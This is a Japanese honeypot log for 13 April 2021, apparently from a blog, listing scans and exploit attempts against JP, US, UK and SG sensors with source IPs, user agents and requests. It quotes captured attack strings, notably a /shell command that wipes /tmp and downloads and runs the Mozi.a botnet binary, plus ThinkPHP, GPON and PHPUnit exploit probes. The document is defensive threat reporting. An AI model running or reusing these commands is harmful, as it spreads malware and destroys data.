2021/04/13 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2021/04/13分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為 /.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPressへのスキャン行為
WordPress Pluginへのスキャン行為

Location：JP

Apache Tomcatへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。

Location：US

DrayTek製品の脆弱性を狙うアクセス
XTCによるスキャン行為
Apache Tomcatへのスキャン行為
110[.]242[.]68[.]4に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//123[.]4[.]253[.]149:45258/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location：UK

curlによるスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
/[0-9a-z]に対してのスキャン
110[.]242[.]68[.]4に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
Gh0stRATのような動き
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//58[.]255[.]211[.]94:48643/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location：SG

他

アクセス数推移

JP：総アクセス数：69 (前日比：-55)
US：総アクセス数：60 (前日比：+22)
UK：総アクセス数：290 (前日比：+119)
SG：総アクセス数：38 (前日比：-131)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	34.65.255.85	United States
1	37.187.196.70	France
1	39.77.217.64	China
1	40.121.52.49	United States
3	40.122.76.169	United States
11	45.155.205.211	Russia
5	50.31.21.4	United States
1	52.154.74.227	United States
1	61.52.43.242	China
1	61.242.40.252	China
1	61.242.54.5	China
1	89.248.168.219	United Kingdom
1	103.153.182.81	India
18	104.211.51.102	United States
1	111.92.80.136	India
1	121.46.25.189	China
1	157.230.114.173	United States
7	165.227.83.68	United States
2	165.227.234.246	United States
1	167.71.41.206	United States
1	178.175.63.195	Albania
1	178.175.96.225	Albania
1	185.100.87.136	Seychelles
1	192.241.203.165	United States
1	192.241.210.103	United States
1	192.241.213.131	United States
1	202.164.138.82	India
1	209.141.45.200	United States

UserAgent一覧

件数	UserAgent
10	-
4	Hello, World
1	Mozilla/4.0
5	Mozilla/5.0 (Android 7.0; Mobile; rv:65.0) Gecko/65.0 Firefox/65.0
7	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
18	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.15 (KHTML, like Gecko) Chrome/24.0.1295.0 Safari/537.15
6	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3	Mozilla/5.0 zgrab/0.x
1	python-requests/2.18.4

リクエスト内容一覧

件数	Method	Request	Protocol
3		\x16\x03\x01
1		\x16\x03\x01\x01\xfa\x01
6	GET	/.env	HTTP/1.1
1	GET	/2018/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/2019/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP	HTTP/1.1
1	GET	/HNAP1	HTTP/1.1
2	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
1	GET	/blog/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/boaform/admin/formLogin?username=admin&psd=admin	HTTP/1.0
1	GET	/cms/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/evox/about	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/hudson	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/jenkins/login	HTTP/1.1
1	GET	/login	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/media/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/news/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/nmaplowercheck1618206376	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/shop/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/site/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/sito/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/test/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/web/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/website/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wordpress/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp-login.php	HTTP/1.1
1	GET	/wp/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp1/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp2/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/xmlrpc.php?rsd	HTTP/1.1
1	HEAD	/	HTTP/1.1
1	HEAD	/4Dwn	HTTP/1.1
1	OPTIONS	/	HTTP/1.0
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
4	POST	/GponForm/diag_Form?images/	HTTP/1.1
3	POST	/HNAP1/	HTTP/1.0
1	POST	/_ignition/execute-solution	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/goform/SystemCommand	HTTP/1.1
1	POST	/index.htm	HTTP/1.1
1	POST	/sdk	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	34.91.79.229	United States
7	36.134.69.69	China
11	45.155.205.211	Russia
1	49.113.101.1	China
3	51.158.78.179	France
1	60.13.136.6	China
1	74.102.39.43	United States
1	89.248.168.219	United Kingdom
3	91.241.19.99	Russia
1	103.41.25.45	India
1	106.45.11.57	China
1	106.54.78.68	China
1	110.167.215.108	China
1	110.177.179.116	China
1	113.58.243.128	China
1	119.39.46.197	China
1	123.4.253.149	China
1	123.14.248.57	China
1	124.225.42.95	China
1	171.36.135.44	China
1	175.184.166.35	China
4	185.142.236.43	Seychelles
1	188.166.239.244	United States
1	192.241.204.235	United States
2	194.116.228.98	Turkey
1	198.199.116.249	United States
1	205.185.122.102	United States
5	208.100.26.229	United States
1	209.141.45.200	United States
1	219.156.60.73	China
1	219.157.64.189	China

UserAgent一覧

件数	UserAgent
12	-
1	Hello, World
1	Hello, world
1	Mozilla/4.0
7	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Safari/537.36
6	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
5	Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 Safari/605.1.15
2	Mozilla/5.0 zgrab/0.x
1	Mozilla/5.01724933 Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E302
4	PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1	XTC
1	python-requests/2.18.4

リクエスト内容一覧

件数	Method	Request	Protocol
3		\x03
1		\x16\x03\x01
1	CONNECT	cn[.]bing[.]com/:443	HTTP/1.1
1	CONNECT	www[.]baidu[.]com/:443	HTTP/1.1
1	CONNECT	www[.]bing[.]com/:443	HTTP/1.1
1	CONNECT	www[.]so[.]com/:443	HTTP/1.1
1	CONNECT	www[.]voanews[.]com/:443	HTTP/1.1
1	GET	/.env	HTTP/1.1
1	GET	/.well-known/security.txt	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP	HTTP/1.1
1	GET	/HNAP1	HTTP/1.1
2	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
1	GET	/boaform/admin/formLogin?username=user&psd=user	HTTP/1.0
2	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/evox/about	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/hudson	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/jenkins/login	HTTP/1.1
1	GET	/login	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/manager/html/	HTTP/1.0
1	GET	/nmaplowercheck1618237681	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//123[.]4[.]253[.]149:45258/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/sitemap.xml	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	/wp-login.php	HTTP/1.1
1	GET	http[:]//dongtaiwang[.]com/	HTTP/1.1
1	GET	http[:]//www[.]bing[.]com/	HTTP/1.1
1	GET	http[:]//www[.]kuandai[.]net[.]cn/pause.html	HTTP/1.0
1	GET	http[:]//www[.]minghui[.]org/	HTTP/1.1
1	GET	http[:]//www[.]rfa[.]org/english/	HTTP/1.1
1	GET	http[:]//www[.]soso[.]com/	HTTP/1.1
1	GET	http[:]//www[.]wujieliulan[.]com/	HTTP/1.1
1	HEAD	/	HTTP/1.1
1	HEAD	http[:]//110[.]242[.]68[.]4/	HTTP/1.1
1	OPTIONS	/	HTTP/1.0
1	POST	/.env	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.0
1	POST	/_ignition/execute-solution	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
1	POST	/goform/SystemCommand	HTTP/1.1
1	POST	/sdk	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	http[:]//cisza[.]website/cc146e464ed79e5db6783d94d1476deab50d873edc2e764a0b8af3c0d67957240092ae0731616eeb3243248a0fed7ce462ece95fd77c8029a0b784aa60c0d9b45dd5a06a1c7ac6585b0fa228141a17ab7c87087034111c15b646338af825785b	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	1.85.217.44	China
1	34.70.30.192	United States
2	35.202.119.45	United States
1	36.32.3.127	China
1	36.106.167.111	China
2	45.119.212.224	Vietnam
11	45.155.205.211	Russia
1	45.229.54.79	Brazil
1	49.113.96.10	China
1	49.113.103.6	China
5	49.234.145.59	China
7	58.246.77.102	China
1	58.255.211.94	China
1	60.13.7.196	China
1	60.13.7.229	China
1	61.3.153.217	India
1	66.240.205.34	United States
34	80.82.78.39	United Kingdom
1	89.248.168.219	United Kingdom
1	110.177.177.36	China
1	117.15.92.176	China
123	122.118.43.108	Taiwan
1	134.122.35.213	United States
1	143.198.239.208	United States
1	143.244.43.45	United Kingdom
1	171.36.135.128	China
4	185.142.236.43	Seychelles
1	192.241.212.111	United States
1	192.241.213.152	United States
1	192.241.213.183	United States
4	198.20.87.98	United States
1	202.164.139.131	India
1	203.115.85.32	India
1	209.141.45.200	United States
73	219.80.144.187	Taiwan

UserAgent一覧

件数	UserAgent
14	-
2	Hello, World
1	Hello, world
1	Mozilla/4.0
33	Mozilla/5.0
7	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
5	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
73	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
122	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2	Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
5	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1
3	Mozilla/5.0 zgrab/0.x
1	Mozilla/5.01678543 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11
4	PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1	curl/7.64.0

リクエスト内容一覧

件数	Method	Request	Protocol
1		-
1		Gh0st\xad
2		\x16\x03\x01
1	CONNECT	cn[.]bing[.]com/:443	HTTP/1.1
1	CONNECT	www[.]baidu[.]com/:443	HTTP/1.1
1	CONNECT	www[.]so[.]com/:443	HTTP/1.1
1	CONNECT	www[.]voanews[.]com/:443	HTTP/1.1
2	GET	/.env	HTTP/1.1
1	GET	/.git/config	HTTP/1.1
2	GET	/.well-known/security.txt	HTTP/1.1
1	GET	/0	HTTP/1.1
1	GET	/1	HTTP/1.1
1	GET	/2	HTTP/1.1
1	GET	/2phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/3	HTTP/1.1
1	GET	/4	HTTP/1.1
1	GET	/5	HTTP/1.1
1	GET	/6	HTTP/1.1
1	GET	/7	HTTP/1.1
1	GET	/8	HTTP/1.1
1	GET	/9	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP	HTTP/1.1
1	GET	/PMA/index.php?lang=en	HTTP/1.1
1	GET	/PMA2011/index.php?lang=en	HTTP/1.1
2	GET	/PMA2012/index.php?lang=en	HTTP/1.1
2	GET	/PMA2013/index.php?lang=en	HTTP/1.1
1	GET	/PMA2015/index.php?lang=en	HTTP/1.1
1	GET	/PMA2016/index.php?lang=en	HTTP/1.1
1	GET	/PMA2019/index.php?lang=en	HTTP/1.1
1	GET	/PMA2020/index.php?lang=en	HTTP/1.1
1	GET	/PMA2021/index.php?lang=en	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/_phpMyAdmin/index.php?lang=en	HTTP/1.1
2	GET	/_phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/a	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
1	GET	/admin/db/index.php?lang=en	HTTP/1.1
1	GET	/admin/pMA/index.php?lang=en	HTTP/1.1
2	GET	/admin/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/phpmyadmin/index.php?lang=en	HTTP/1.1
3	GET	/admin/sqladmin/index.php?lang=en	HTTP/1.1
2	GET	/admin/sysadmin/index.php?lang=en	HTTP/1.1
3	GET	/admin/web/index.php?lang=en	HTTP/1.1
1	GET	/administrator/admin/index.php?lang=en	HTTP/1.1
1	GET	/administrator/db/index.php?lang=en	HTTP/1.1
1	GET	/administrator/phpMyAdmin/index.php?lang=en	HTTP/1.1
4	GET	/administrator/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/administrator/pma/index.php?lang=en	HTTP/1.1
1	GET	/administrator/web/index.php?lang=en	HTTP/1.1
1	GET	/b	HTTP/1.1
1	GET	/boaform/admin/formLogin?username=admin&psd=admin	HTTP/1.0
1	GET	/c	HTTP/1.1
1	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/d	HTTP/1.1
1	GET	/database/index.php?lang=en	HTTP/1.1
1	GET	/db/index.php?lang=en	HTTP/1.1
2	GET	/db/myadmin/index.php?lang=en	HTTP/1.1
2	GET	/db/phpMyAdmin-3/index.php?lang=en	HTTP/1.1
1	GET	/db/phpMyAdmin3/index.php?lang=en	HTTP/1.1
2	GET	/db/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/phpmyadmin3/index.php?lang=en	HTTP/1.1
1	GET	/db/webadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/webdb/index.php?lang=en	HTTP/1.1
2	GET	/db/websql/index.php?lang=en	HTTP/1.1
1	GET	/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/e	HTTP/1.1
1	GET	/f	HTTP/1.1
2	GET	/favicon.ico	HTTP/1.1
1	GET	/g	HTTP/1.1
1	GET	/h	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	/hudson	HTTP/1.1
1	GET	/i	HTTP/1.1
2	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/j	HTTP/1.1
1	GET	/jenkins/login	HTTP/1.1
1	GET	/k	HTTP/1.1
1	GET	/login	HTTP/1.1
1	GET	/m	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
2	GET	/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql-admin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/admin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/mysqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/mysql/pma/index.php?lang=en	HTTP/1.1
1	GET	/mysql/sqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/mysql/web/index.php?lang=en	HTTP/1.1
1	GET	/mysqladmin/index.php?lang=en	HTTP/1.1
1	GET	/mysqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/n	HTTP/1.1
1	GET	/o	HTTP/1.1
1	GET	/php-my-admin/index.php?lang=en	HTTP/1.1
2	GET	/phpMyAdmin-3/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin2/index.php?lang=en	HTTP/1.1
1	GET	/phpmy-admin/index.php?lang=en	HTTP/1.1
2	GET	/phpmy/index.php?lang=en	HTTP/1.1
1	GET	/phpmyAdmin/index.php?lang=en	HTTP/1.1
73	GET	/phpmyadmin/	HTTP/1.1
1	GET	/phpmyadmin/index.php	HTTP/1.1
1	GET	/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin1/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2011/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2012/index.php?lang=en	HTTP/1.1
2	GET	/phpmyadmin2013/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2014/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2015/index.php?lang=en	HTTP/1.1
2	GET	/phpmyadmin2016/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2019/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2020/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin3/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin4/index.php?lang=en	HTTP/1.1
2	GET	/phpmyadmin5/index.php?lang=en	HTTP/1.1
2	GET	/phpmyadmin_/index.php?lang=en	HTTP/1.1
1	GET	/phppma/index.php?lang=en	HTTP/1.1
1	GET	/pma/index.php?lang=en	HTTP/1.1
1	GET	/pma2012/index.php?lang=en	HTTP/1.1
1	GET	/pma2015/index.php?lang=en	HTTP/1.1
1	GET	/pma2016/index.php?lang=en	HTTP/1.1
1	GET	/pma2017/index.php?lang=en	HTTP/1.1
1	GET	/pma2018/index.php?lang=en	HTTP/1.1
1	GET	/pma2019/index.php?lang=en	HTTP/1.1
1	GET	/pma2020/index.php?lang=en	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/program/index.php?lang=en	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/q	HTTP/1.1
1	GET	/r	HTTP/1.1
2	GET	/robots.txt	HTTP/1.1
1	GET	/s	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//58[.]255[.]211[.]94:48643/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/shopdb/index.php?lang=en	HTTP/1.1
2	GET	/sitemap.xml	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
3	GET	/sql/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/php-myadmin/index.php?lang=en	HTTP/1.1
2	GET	/sql/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpMyAdmin2/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpmanager/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpmy-admin/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpmyadmin2/index.php?lang=en	HTTP/1.1
3	GET	/sql/sql/index.php?lang=en	HTTP/1.1
1	GET	/sql/sqladmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/sqlweb/index.php?lang=en	HTTP/1.1
1	GET	/sql/webdb/index.php?lang=en	HTTP/1.1
1	GET	/sql/websql/index.php?lang=en	HTTP/1.1
2	GET	/sqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/t	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/u	HTTP/1.1
1	GET	/v	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/w	HTTP/1.1
2	GET	/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	/wp-login.php	HTTP/1.1
1	GET	/x	HTTP/1.1
1	GET	/z	HTTP/1.1
1	GET	http[:]//dongtaiwang[.]com/	HTTP/1.1
1	GET	http[:]//www[.]epochtimes[.]com/	HTTP/1.1
1	GET	http[:]//www[.]rfa[.]org/english/	HTTP/1.1
1	GET	http[:]//www[.]soso[.]com/	HTTP/1.1
1	GET	http[:]//www[.]wujieliulan[.]com/	HTTP/1.1
1	HEAD	http[:]//110[.]242[.]68[.]4/	HTTP/1.1
1	OPTIONS	/	HTTP/1.0
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
2	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.0
1	POST	/_ignition/execute-solution	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/goform/SystemCommand	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.57.122.210	Romania
1	42.225.251.100	China
1	45.148.10.50	Romania
11	45.155.205.211	Russia
4	49.229.22.10	Thailand
1	51.15.113.84	France
1	52.154.74.227	United States
1	89.248.168.219	United Kingdom
3	163.172.159.134	United Kingdom
3	163.172.168.251	United Kingdom
1	167.71.75.87	United States
1	182.127.210.239	China
1	185.153.180.175	Cyprus
1	188.166.169.128	United States
1	188.166.239.244	United States
1	192.241.205.166	United States
1	192.241.210.208	United States
1	192.241.213.19	United States
1	209.141.45.200	United States
2	212.237.21.34	Italy

UserAgent一覧

件数	UserAgent
6	-
1	Mozilla/4.0
4	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.15 (KHTML, like Gecko) Chrome/24.0.1295.0 Safari/537.15
2	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3	Mozilla/5.0 zgrab/0.x
1	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
1	python-requests/2.18.4

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x16\x03\x01\x01\xfb\x01
2	CONNECT	www[.]bing[.]com/:443	HTTP/1.1
5	GET	/.env	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
2	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
2	GET	/boaform/admin/formLogin?username=ec8&psd=ec8	HTTP/1.0
2	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/hudson	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21	HTTP/1.1
1	GET	/jenkins/login	HTTP/1.1
1	GET	/login	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	/wp-login.php	HTTP/1.1
2	GET	http[:]//www[.]bing[.]com/	HTTP/1.1
1	HEAD	/4Dwn	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
